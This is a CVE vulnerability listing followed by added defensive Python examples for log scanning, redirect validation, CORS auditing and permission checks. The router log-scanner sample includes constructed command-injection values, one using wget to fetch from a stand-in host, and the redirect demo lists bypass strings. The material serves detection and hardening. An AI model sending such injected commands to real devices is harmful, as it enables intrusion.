Total: 286780 CVE
CVE | Vendors | Products | Updated | CVSS v3.1 |
---|---|---|---|---|
CVE-2018-10562 | 1 Dasannetworks | 2 Gpon Router, Gpon Router Firmware | 2025-03-26 | 9.8 Critical |
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. | ||||
CVE-2023-23948 | 1 Owncloud | 1 Owncloud Client | 2025-03-26 | 6.2 Medium |
The ownCloud Android app allows ownCloud users to access, share, and edit files and folders. Version 2.21.1 of the ownCloud Android app is vulnerable to SQL injection in `FileContentProvider.kt`. This issue can lead to information disclosure. Two databases, `filelist` and `owncloud_database`, are affected. In version 3.0, the `filelist` database was deprecated. However, injections affecting `owncloud_database` remain relevant as of version 3.0. | ||||
CVE-2020-36250 | 1 Owncloud | 1 Owncloud Client | 2025-03-26 | 6.1 Medium |
In the ownCloud application before 2.15 for Android, the lock protection mechanism can be bypassed by moving the system date/time into the past. | ||||
CVE-2020-36248 | 1 Owncloud | 1 Owncloud Client | 2025-03-26 | 3.9 Low |
The ownCloud application before 2.15 for Android allows attackers to use adb to include a PIN preferences value in a backup archive, and consequently bypass the PIN lock feature by restoring from this archive. | ||||
CVE-2025-27267 | | | 2025-03-26 | 7.1 High |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in srcoley Random Quotes allows Reflected XSS. This issue affects Random Quotes: from n/a through 1.3. | ||||
CVE-2024-7806 | 1 Openwebui | 1 Open Webui | 2025-03-26 | 8.8 High |
A vulnerability in open-webui/open-webui versions <= 0.3.8 allows remote code execution by non-admin users via Cross-Site Request Forgery (CSRF). The application uses cookies with the SameSite attribute set to lax for authentication and lacks CSRF tokens. This allows an attacker to craft a malicious HTML page that, when accessed by a victim, can modify the Python code of an existing pipeline and execute arbitrary code with the victim's privileges. | ||||
CVE-2015-5955 | 1 Owncloud | 1 Owncloud Client | 2025-03-26 | N/A |
ownCloud iOS app before 3.4.4 does not properly switch state between multiple instances, which might allow remote instance administrators to obtain sensitive credential and cookie information by reading authentication headers. | ||||
CVE-2021-29256 | 1 Arm | 3 Bifrost, Midgard, Valhall | 2025-03-26 | 8.8 High |
The Arm Mali GPU kernel driver allows an unprivileged user to achieve access to freed memory, leading to information disclosure or root privilege escalation. This affects Bifrost r16p0 through r29p0 before r30p0, Valhall r19p0 through r29p0 before r30p0, and Midgard r28p0 through r30p0. | ||||
CVE-2024-8021 | 1 Gradio Project | 1 Gradio | 2025-03-26 | 6.1 Medium |
An open redirect vulnerability exists in the latest version of gradio-app/gradio. The vulnerability allows an attacker to redirect users to a malicious website by URL encoding. This can be exploited by sending a crafted request to the application, which results in a 302 redirect to an attacker-controlled site. | ||||
CVE-2023-21237 | 1 Google | 1 Android | 2025-03-26 | 5.5 Medium |
In applyRemoteView of NotificationContentInflater.java, there is a possible way to hide foreground service notification due to misleading or insufficient UI. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-13. Android ID: A-251586912 | ||||
CVE-2024-8026 | 1 Qanything | 1 Qanything | 2025-03-26 | 8.1 High |
A Cross-Site Request Forgery (CSRF) vulnerability exists in the backend API of netease-youdao/qanything, as of commit d9ab8bc. The backend server has overly permissive CORS headers, allowing all cross-origin calls. This vulnerability affects all backend endpoints, enabling actions such as creating, uploading, listing, deleting files, and managing knowledge bases. | ||||
CVE-2025-28858 | | | 2025-03-26 | 7.1 High |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Arrow Plugins Arrow Maps allows Reflected XSS. This issue affects Arrow Maps: from n/a through 1.0.9. | ||||
CVE-2010-2572 | 1 Microsoft | 1 Powerpoint | 2025-03-26 | 7.8 High |
Buffer overflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint 95 document, aka "PowerPoint Parsing Buffer Overflow Vulnerability." | ||||
CVE-2025-28865 | | | 2025-03-26 | 7.1 High |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in lionelroux WP Colorful Tag Cloud allows Reflected XSS. This issue affects WP Colorful Tag Cloud: from n/a through 2.0.1. | ||||
CVE-2018-0798 | 1 Microsoft | 3 Office, Office Compatibility Pack, Word | 2025-03-26 | 8.8 High |
Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allows a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". | ||||
CVE-2024-8053 | 1 Openwebui | 1 Open Webui | 2025-03-26 | 8.2 High |
In version v0.3.10 of open-webui/open-webui, the `api/v1/utils/pdf` endpoint lacks authentication mechanisms, allowing unauthenticated attackers to access the PDF generation service. This vulnerability can be exploited by sending a POST request with an excessively large payload, potentially leading to server resource exhaustion and denial of service (DoS). Additionally, unauthorized users can misuse the endpoint to generate PDFs without verification, resulting in service misuse and potential operational and financial impacts. | ||||
CVE-2018-0802 | 1 Microsoft | 3 Office, Office Compatibility Pack, Word | 2025-03-26 | 7.8 High |
Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allows a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE is unique from CVE-2018-0797 and CVE-2018-0812. | ||||
CVE-2025-2098 | | | 2025-03-26 | N/A |
Fast CAD Reader application on macOS was found to be installed with incorrect file permissions (rwxrwxrwx). This is inconsistent with standard macOS security practices, where applications should have drwxr-xr-x permissions. Incorrect permissions allow for Dylib Hijacking. Guest account, other users and applications can exploit this vulnerability for privilege escalation. This issue affects Fast CAD Reader in possibly all versions, since the vendor has not responded to our messages. The tested version was 4.1.5. | ||||
CVE-2025-27406 | | | 2025-03-26 | 7.7 High |
Icinga Reporting is the central component for reporting-related functionality in the monitoring web frontend and framework Icinga Web 2. A vulnerability present in versions 0.10.0 through 1.0.2 allows setting up a template that embeds arbitrary JavaScript. This enables the attacker to act on behalf of the user if the template is previewed, and on behalf of the headless browser if a report using the template is printed to PDF. This issue has been resolved in version 1.0.3 of Icinga Reporting. As a workaround, review all templates and remove suspicious settings. | ||||
CVE-2025-27405 | | | 2025-03-26 | 7.7 High |
Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. A vulnerability in versions prior to 2.11.5 and 2.12.3 allows an attacker to craft a URL that, once visited by any user, embeds arbitrary JavaScript into Icinga Web and acts on behalf of that user. This issue has been resolved in versions 2.11.5 and 2.12.3 of Icinga Web 2. As a workaround, those who have Icinga Web 2.12.2 may enable a content security policy in the application settings. | ||||
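The command injection in CVE-2018-10562 (Dasan GPON routers, above) leaves a clear trace in web-server or proxy logs: a ping target is a hostname or an IP address, so any shell metacharacter in `dest_host` is anomalous. The Python script below is an added example, not code from this page or from Dasan, that scans constructed access-log lines for such requests. It goes slightly beyond the entry by flagging every `diag_action` value rather than only `ping`, and it only sees parameters carried in the query string, so requests that send the form in a POST body would need request-body logging to be caught this way.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in common log format (not real router traffic; the
# addresses are made up). The third, fifth and sixth requests carry shell metacharacters
# in dest_host, which is the pattern the CVE-2018-10562 description refers to.
SAMPLE_LOG = """\
10.0.0.7 - - [26/Mar/2025:10:02:15 +0000] "GET /GponForm/diag_Form?diag_action=ping&dest_host=8.8.8.8 HTTP/1.1" 200 300
10.0.0.7 - - [26/Mar/2025:10:02:20 +0000] "GET /diag.html HTTP/1.1" 200 1024
10.0.0.9 - - [26/Mar/2025:10:03:40 +0000] "GET /GponForm/diag_Form?diag_action=ping&dest_host=8.8.8.8%60id%60 HTTP/1.1" 200 300
10.0.0.9 - - [26/Mar/2025:10:03:41 +0000] "GET /diag.html HTTP/1.1" 200 1024
10.0.0.11 - - [26/Mar/2025:10:04:00 +0000] "GET /GponForm/diag_Form?diag_action=ping&dest_host=127.0.0.1;wget+http://198.51.100.4/x HTTP/1.1" 200 300
10.0.0.12 - - [26/Mar/2025:10:05:00 +0000] "GET /GponForm/diag_Form?diag_action=traceroute&dest_host=a;b HTTP/1.1" 200 300
"""

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A ping target should be a hostname, an IPv4 address or an IPv6 literal: nothing else.
SAFE_HOST = re.compile(r'^[A-Za-z0-9.:\-]{1,253}$')


def diag_params(request_target):
    """Return (diag_action, [dest_host, ...]) for a request to GponForm/diag_Form, else None."""
    url = urlsplit(request_target)
    if not url.path.endswith('/GponForm/diag_Form'):
        return None
    # Only '&' separates parameters: a ';' inside dest_host is part of the injected command
    # and must stay in the value. parse_qs also percent-decodes and turns '+' into a space.
    params = parse_qs(url.query, separator='&')
    return params.get('diag_action', [''])[0], params.get('dest_host', [])


def find_diag_injections(log_text):
    """Return [(client_ip, diag_action, dest_host)] for diag requests whose target is not a plain host."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        parsed = diag_params(match.group('target'))
        if parsed is None:
            continue
        action, hosts = parsed
        for host in hosts:
            if not SAFE_HOST.match(host):
                hits.append((line.split(' ', 1)[0], action, host))
    return hits


if __name__ == '__main__':
    for ip, action, host in find_diag_injections(SAMPLE_LOG):
        print(f'{ip}: diag_action={action} dest_host={host!r}')
```

A client that sends a flagged `diag_Form` request and then fetches `/diag.html` within a second or two, as the second flagged address does above, is retrieving command output exactly as the entry describes; correlating the two requests per source address is the obvious next step for an alert.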
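The CVE-2024-8021 entry (gradio, above) only says that the open redirect is reached "by URL encoding"; it does not say which check was bypassed. The following Python is an added example, not Gradio's code, showing the general shape of that bug: a naive validator that looks at the raw first characters of a redirect target next to a hardened one that percent-decodes first, then refuses anything with a scheme or host, a leading `//`, a backslash, or the tab and newline characters browsers silently drop. The candidate targets in the demonstration are constructed.

```python
from urllib.parse import unquote, urlsplit


def naive_is_local(target):
    """The kind of check an open redirect hides behind: it inspects the raw string only."""
    return target.startswith('/') and not target.startswith('//')


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing, so %252F (double-encoded '/') is seen as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_redirect_target(target, default='/'):
    """Return target only if it resolves to a path on this site; otherwise return default."""
    decoded = fully_decode(target)
    # Browsers drop tab, CR and LF from URLs, so '/%09/evil' would navigate to '//evil'.
    decoded = decoded.replace('\t', '').replace('\r', '').replace('\n', '')
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:                  # 'https://evil', '//evil', 'javascript:...'
        return default
    if '\\' in decoded or decoded.startswith('//'):   # '/\\evil' and '///evil' are host-relative in browsers
        return default
    if not decoded.startswith('/'):                   # relative paths are ambiguous; insist on an absolute path
        return default
    return decoded


if __name__ == '__main__':
    for candidate in ('/dashboard?tab=2', '//evil.example/', '/%2F%2Fevil.example', '%2F%2Fevil.example'):
        print(f'{candidate!r:28} naive={naive_is_local(candidate)!s:5} hardened={safe_redirect_target(candidate)!r}')
```

The safer design, where the application allows it, is not to accept a URL at all but an index into a server-side table of permitted destinations; the validator above is for the cases where a free-form `next` parameter cannot be removed.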
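CVE-2024-8026 (netease-youdao/qanything, above) comes down to CORS headers that admit every origin. The Python below is an added example, not QAnything's code, in two halves: an audit function that classifies the CORS headers a server returned for a probe sent with a chosen `Origin`, distinguishing a wildcard from the more dangerous reflected-origin-with-credentials case, and a hardened responder that only echoes origins from an allowlist. The allowlist entry `https://app.example` and the probe origin are assumptions for the demonstration; the entry names no intended origins.

```python
# Assumed allowlist for the hardened side; the CVE text names no intended origins.
ALLOWED_ORIGINS = {'https://app.example'}


def cors_findings(request_origin, response_headers):
    """Audit the CORS headers a server returned for a probe sent with the given Origin."""
    hdrs = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = hdrs.get('access-control-allow-origin')
    credentials = hdrs.get('access-control-allow-credentials', '').lower() == 'true'
    findings = []
    if acao is None:
        return findings  # no CORS grant at all: the browser blocks cross-origin reads
    if acao == '*':
        findings.append('wildcard origin: any site can read unauthenticated responses')
        if credentials:
            findings.append('wildcard with credentials: browsers reject the combination, '
                            'but it shows the server intends credentialed cross-origin access')
    elif acao == 'null':
        findings.append("'null' origin allowed: sandboxed iframes and file:// pages match it")
    elif acao == request_origin:
        findings.append('request Origin reflected without an allowlist')
        if credentials:
            findings.append('reflected origin with credentials: cookies are sent, '
                            'so any site can call the API as the logged-in user')
    return findings


def cors_headers_for(request_origin):
    """Hardened side: echo only allowlisted origins, and tell caches the answer varies by Origin."""
    if request_origin in ALLOWED_ORIGINS:
        return {
            'Access-Control-Allow-Origin': request_origin,
            'Access-Control-Allow-Credentials': 'true',
            'Vary': 'Origin',
        }
    return {}


if __name__ == '__main__':
    probe = 'https://attacker.example'
    # Constructed responses standing in for what a real probe would return.
    for label, headers in (('permissive', {'Access-Control-Allow-Origin': '*'}),
                           ('reflecting', {'Access-Control-Allow-Origin': probe,
                                           'Access-Control-Allow-Credentials': 'true'}),
                           ('hardened', cors_headers_for(probe))):
        print(label, cors_findings(probe, headers) or ['no CORS issue'])
```

Note that a wildcard grant is only harmless if the API also requires a credential the browser will not attach automatically; an API with no authentication at all, which is what the entry implies for the affected endpoints, is fully driveable from any page once the wildcard is in place.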
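The condition behind CVE-2025-2098 (Fast CAD Reader, above) is a world-writable application bundle, and it is easy to audit for across a whole `/Applications` directory. The Python below is an added example, not the reporter's or vendor's code: it walks a directory tree and reports every entry whose group or other write bit is set, which is what lets another local user drop a dylib into a bundle. Because the verifier does not run on macOS, the script builds a constructed stand-in tree in a temporary directory with one correctly installed bundle and one `rwxrwxrwx` bundle; on a Mac you would call `writable_by_others('/Applications')` directly.

```python
import os
import shutil
import stat
import tempfile

GROUP_OR_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def writable_by_others(root):
    """Return sorted (relative_path, octal_mode) for every entry under root that group or others can write.

    Any such directory inside an .app bundle lets another local user drop or replace a dylib
    the application loads, which is the dylib hijacking condition the report describes.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # symlink mode bits are not meaningful; the target is checked on its own
            if mode & GROUP_OR_OTHER_WRITE:
                findings.append((os.path.relpath(path, root), oct(stat.S_IMODE(mode))))
    return sorted(findings)


def build_demo_tree():
    """Constructed stand-in for /Applications: one correctly installed bundle, one world-writable one."""
    root = tempfile.mkdtemp(prefix='apps-')
    for bundle, mode in (('Good.app', 0o755), ('Bad.app', 0o777)):
        macos_dir = os.path.join(root, bundle, 'Contents', 'MacOS')
        os.makedirs(macos_dir)
        binary = os.path.join(macos_dir, 'reader')
        with open(binary, 'w') as fh:
            fh.write('#!/bin/sh\n')
        # chmod explicitly: the process umask would otherwise strip the bits being demonstrated
        for directory in (os.path.join(root, bundle), os.path.join(root, bundle, 'Contents'), macos_dir):
            os.chmod(directory, mode)
        os.chmod(binary, mode)
    return root


if __name__ == '__main__':
    demo_root = build_demo_tree()
    try:
        for rel_path, mode in writable_by_others(demo_root):
            print(f'{mode} {rel_path}')
    finally:
        shutil.rmtree(demo_root)
```

The remediation the entry implies is to clear the group and other write bits on the bundle (`chmod -R go-w`), which restores the `drwxr-xr-x` layout the description calls standard.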